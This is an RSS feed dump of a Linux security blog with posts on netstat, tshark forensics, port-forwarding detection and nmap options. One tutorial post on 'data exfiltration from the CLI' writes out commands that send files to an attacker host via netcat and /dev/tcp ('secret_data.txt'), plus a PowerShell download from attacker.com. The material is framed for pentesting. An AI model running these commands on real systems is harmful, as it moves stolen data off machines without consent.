Black Bytes » Security
http://www.blackbytes.info
Linux & Programming tips
Wed, 08 Apr 2015 17:38:12 +0000

Watching your network
http://www.blackbytes.info/2014/03/watching-your-network/
Sat, 29 Mar 2014 19:32:54 +0000
There are a number of tools you can use in Linux to see what is going on on your machine at the network level; one of the most common is netstat. This command will show you all the connections on your system, including some that you may not be interested in, like UNIX sockets. There are a few flags you can pass to netstat; my favourite set of flags is -antp:

-a  show all sockets, listening ones included
-n  show IP addresses instead of host names
-t  show only TCP connections
-p  show the process ID/name that owns each socket

Another command that will give you similar results is: lsof -nPi

What if you wanted to see the 10 IP addresses with the most connections to your server? You could use a one-liner like this one I came up with:

netstat -ant | grep -i establ | awk -F" " '{print $5}' | cut -d':' -f 1 | sort -n | uniq -c | sort -nr | head -n10
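The same top-N count as a shell function, added here as an example that is not from the original post: it reads netstat -ant output from stdin and strips only the trailing ":port", so IPv6 peers (whose addresses contain colons and would be truncated by cut -d':') are counted correctly. The netstat output below is constructed, not captured from a real host.

```shell
#!/bin/sh
# top_peers N: count ESTABLISHED connections per remote address in `netstat -ant`
# output read from stdin and print the N busiest peers as "count address".
# The port is removed with a regex anchored at the end of the field, so an IPv6
# address such as 2001:db8::99 keeps all of its colons.
top_peers() {
    awk '$6 == "ESTABLISHED" {
            addr = $5
            sub(/:[0-9]+$/, "", addr)   # drop only the trailing ":port"
            count[addr]++
         }
         END { for (a in count) print count[a], a }' \
    | sort -k1,1nr -k2 | head -n "${1:-10}"
}

# Constructed sample of `netstat -ant` output (not captured from a real host).
SAMPLE_NETSTAT='Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 10.0.0.1:80             10.0.0.5:51234          ESTABLISHED
tcp        0      0 10.0.0.1:80             10.0.0.5:51235          ESTABLISHED
tcp        0      0 10.0.0.1:80             10.0.0.5:51236          ESTABLISHED
tcp        0      0 10.0.0.1:443            10.0.0.7:40001          ESTABLISHED
tcp        0      0 10.0.0.1:22             10.0.0.9:55555          TIME_WAIT
tcp6       0      0 2001:db8::1:80          2001:db8::99:40022      ESTABLISHED
tcp6       0      0 2001:db8::1:80          2001:db8::99:40023      ESTABLISHED'

# Three busiest peers from the sample: 3 10.0.0.5 / 2 2001:db8::99 / 1 10.0.0.7
printf '%s\n' "$SAMPLE_NETSTAT" | top_peers 3
```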

You can also watch connections live as they are being made. For that you can use the “watch” command, which re-runs any command every X seconds (2 seconds by default) and shows you the output. So if you wanted to see all the connections on port 80 updated every five seconds you would run:

watch -n5 "netstat -antp | grep :80"

There are other tools that also let you see live connections and even get an idea of the traffic you are getting, such as iptraf and iftop. If you need to see the actual data going through your network you will need a packet sniffer like tcpdump or wireshark.

Data exfiltration from the CLI
http://www.blackbytes.info/2013/12/data-exfiltration-from-the-cli/
Sun, 29 Dec 2013 19:04:03 +0000
If you do pentesting or any kind of security analysis you have probably found yourself needing to transfer data between your machine and the vulnerable machine. It is useful to know a few ways to do this in case one of them doesn’t work in your specific situation.

Generic

Samba can be configured on the attacker machine so that you can connect from the vulnerable machine using the “net use” (Windows) or “mount -t cifs” (Linux) commands and then transfer files.

example (net use needs a share name after the server; replace <share> with the share exported by your smb.conf):
net use z: \\192.168.1.20\<share> /u:attacker

smb.conf documentation: http://www.samba.org/samba/docs/using_samba/ch06.html

FTP is another way we can do this, but remember that both the data and the login credentials travel in plain text. Also, since the client is interactive, if you only have a non-interactive shell you will need to script it.

example for the windows ftp client:
open ftp.domain.com
username
password
get file.txt
bye

run with ftp -s:script-name.txt

example for the linux ftp client:
http://www.stratigery.com/scripting.ftp.html

TFTP is a simpler version of FTP: it uses UDP and it doesn’t support authentication. A popular TFTP server is Tftpd32. It’s still in use for things like backing up a router configuration or uploading the latest firmware.

SSH allows us to transfer data securely; we can use the scp command to transfer files over ssh.

Netcat is also an option; it is usually available in most Linux distributions, and there is also a Windows version. If you need encryption you should try cryptcat or socat.

example:
echo data | nc 192.168.1.20 80

Linux specific

On Linux you can use /dev/tcp/<host>/<port> to open a connection to another host (you need a recent version of Bash for this to work); we can then use netcat to capture the data on the other end.

example (cat sends the file contents; echo would only send the file name):
cat secret_data.txt > /dev/tcp/192.168.1.20/500

Windows specific

On Windows we can use PowerShell to open TCP connections or to download files over HTTP.

example:

$http = New-Object System.Net.WebClient
$url  = "http://www.attacker.com"
$file = "test.html"
$http.DownloadFile($url, $file)

As you can see there are many ways to transfer files, so pick the one that suits you best and enjoy!

Network forensics with tshark
http://www.blackbytes.info/2013/09/network-forensics-with-tshark/
Sun, 15 Sep 2013 12:18:18 +0000
Let’s say we have a packet capture file (.pcap) and we want to get as much information out of it as possible. One option is wireshark and its command-line version tshark. Using the latter we can manipulate and format the output with tools like sed, grep, awk…

Extracting host names with tshark

Since we are dealing with mostly HTTP traffic we may be interested in the sites that have been visited. To obtain this information we can use the http.host field and a bit of sorting; this shows us the top 10 sites.

tshark -T fields -e http.host -r tor.pcap > dns.txt
grep -v '^$' dns.txt | sort | uniq -c | sort -nr | head

(tshark prints an empty line for every packet without an http.host field, so the blank lines are dropped before counting.)

User agents

tshark -Y 'http contains "User-Agent:"' -T fields -e http.user_agent -r tor2b.pcap | sort | uniq -c | sort -nr | less

The option -Y lets us apply display filters, in the same way we would in wireshark (older tshark releases used -R for this; current versions reserve -R for two-pass read filters that need the -2 flag). You can find a list of useful display filters here.

Email address

Another interesting bit of data is email addresses, which we can extract by using a regexp on the raw data.

tshark -r tor.pcap -Y "data-text-lines" -T fields -e text > alldata.txt
grep -Eio '\b[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}\b' alldata.txt | sort | uniq

Requested urls

We can also get a list of all the requested URLs (via the GET method):

tshark -r http-traffic.pcap -T fields -e http.host -e http.request.uri -Y 'http.request.method == "GET"' | sort | uniq | less
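A small post-processing helper for the field output above, added here as an example that is not from the original post: it joins http.host and http.request.uri, skips the records where tshark printed an empty column (packets that lack one of the two fields) and ranks the URLs by request count. The sample field lines are constructed, not taken from a real capture.

```shell
#!/bin/sh
# summarize_urls: read the tab-separated output of
#   tshark -r capture.pcap -T fields -e http.host -e http.request.uri -Y 'http.request.method == "GET"'
# from stdin and print "count host/uri", most requested first. tshark emits an
# empty column when a packet lacks a field, so records missing either part are skipped.
summarize_urls() {
    awk -F'\t' '$1 != "" && $2 != "" { count[$1 $2]++ }
                END { for (u in count) print count[u], u }' \
    | sort -k1,1nr -k2
}

# Constructed sample of tshark field output (tab-separated; not from a real capture).
# The third record has no http.host and is dropped.
SAMPLE_FIELDS="$(printf 'example.org\t/index.html\nexample.org\t/index.html\n\t/no-host\ncdn.example.net\t/a.js\nexample.org\t/login\n')"

# Prints: 2 example.org/index.html / 1 cdn.example.net/a.js / 1 example.org/login
printf '%s\n' "$SAMPLE_FIELDS" | summarize_urls
```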


Don’t forget to take a look at the official documentation.

Playing with firewalls: setting up and detecting port forwarding.
http://www.blackbytes.info/2013/08/firewall-fun/
Sat, 03 Aug 2013 15:31:25 +0000
Have you ever wanted to be able to tell if a host is using port forwarding? In this post we will set up a test scenario and you will learn how!

Setting up our lab

For this experiment we will need three hosts; in my case I have two Linux VMs and a Windows box. One of them will be used for scanning with nmap and sending packets with hping, the second is going to be our NAT/firewall device, and the Windows machine will host the real service.

Firewall setup

In case you need a refresher on iptables take a look at this link. We will need two rules for port forwarding: one changes the destination IP and port of the received packet (PREROUTING/DNAT) and the other changes the source IP (MASQUERADE) so the connection appears to come from the firewall instead of the client; this also adds an entry to the conntrack table so that when the response comes back it can be routed correctly.

iptables -t nat -A PREROUTING -p tcp --dport <port> -j DNAT --to <dest-ip>:<dest-port>
iptables -t nat -A POSTROUTING -o <interface> -j MASQUERADE

In addition we have to enable IP forwarding:
echo 1 > /proc/sys/net/ipv4/ip_forward

Now we can test whether the rules work from our scanning machine: scan the port that is being forwarded and check if the rule counters have increased with the following command:

iptables -t nat -L -n -v

If the “pkts” column has increased after the scan then the rules are probably working correctly.


Putting things together

At this point the only thing left is running some service on the destination host and testing with nmap that the port is open; then we can look at how to tell a forwarded port from a local service. For this we will use hping with the --syn option to send a packet with the SYN bit set and -p to indicate our target port (in our case this will be an open port on the firewall itself). We will note the header values we get in the response (TTL, ID, and window size); these will give away the forwarded port.

And finally we will launch another hping against the firewall, but this time with the port that we suspect is being forwarded, note how all three values (TTL, ID, and window size) have changed. This tells us that the host responding to this connection attempt is a different one. In addition, we can use these values for passive OS recon.
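A helper for the comparison described above, added here as an example that is not part of the original post: it pulls ttl, id and win out of two hping reply lines and names the fields that differ, so a non-empty result flags a port that is answered by a different host. The reply lines are constructed, and the parser assumes hping's space-separated key=value reply format.

```shell
#!/bin/sh
# hping_fields LINE: print "ttl id win" from one hping reply line, which hping
# prints as space-separated key=value pairs, e.g.
#   len=46 ip=192.168.1.1 ttl=64 id=0 sport=22 flags=SA seq=0 win=29200 rtt=0.4 ms
hping_fields() {
    printf '%s\n' "$1" | awk '{
        for (i = 1; i <= NF; i++) {
            split($i, kv, "=")
            if (kv[1] == "ttl" || kv[1] == "id" || kv[1] == "win") f[kv[1]] = kv[2]
        }
        print f["ttl"], f["id"], f["win"]
    }'
}

# differing_fields REPLY_A REPLY_B: name the header fields that differ between two
# replies from the same IP. A locally served port and a forwarded port are answered
# by different TCP stacks, so TTL (one hop further away), IP ID and window size
# change; an empty result means the same host answered both probes.
differing_fields() {
    set -- $(hping_fields "$1") $(hping_fields "$2")
    changed=""
    if [ "$1" != "$4" ]; then changed="$changed ttl"; fi
    if [ "$2" != "$5" ]; then changed="$changed id"; fi
    if [ "$3" != "$6" ]; then changed="$changed win"; fi
    printf '%s\n' "${changed# }"
}

# Constructed replies (not real captures): port 22 is answered by the firewall
# itself, port 90 is DNATed to a Windows host behind it (TTL 128 minus one hop).
LOCAL_REPLY="len=46 ip=192.168.1.1 ttl=64 id=0 sport=22 flags=SA seq=0 win=29200 rtt=0.4 ms"
FWD_REPLY="len=46 ip=192.168.1.1 ttl=127 id=4321 sport=90 flags=SA seq=0 win=8192 rtt=1.1 ms"

# Prints "ttl id win": all three fields differ, so port 90 is served by another host.
differing_fields "$LOCAL_REPLY" "$FWD_REPLY"
```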


That’s it for now! We have seen how to set up IP forwarding and how we can learn about the target network from packet header fields using tools like hping.

Nmap: beyond the basics
http://www.blackbytes.info/2013/07/nmap-beyond-the-basics/
Sat, 27 Jul 2013 16:01:10 +0000
You have probably used nmap before, but did you know there are plenty of cool options to spice up your scanning sessions? For example, you can specify the --open option to show only open ports, or --reason if you want to see why a port is in the state it is (open/closed/filtered). If you want to dig deeper you could add the --packet-trace flag, which makes nmap show you all the packets sent and received.

sudo nmap -sS -p 80 66.187.104.70 --open --reason --packet-trace


More advanced nmap

Another useful thing you can do with nmap is a reverse DNS scan: using the -sL option and a bit of awk magic you can get output like this:

nmap -sL 66.187.104.70/24 -oG - | grep -v '(\w*)' | grep -v Nmap | awk '{ print $2 " " $3 }'

 


You could also use the --traceroute option and save the results in XML format using -oX, then load this into zenmap for visualization.

If you want to learn more take a look at the online nmap book here, or you can buy the full book from Amazon: Nmap Network Scanning: The Official Nmap Project Guide
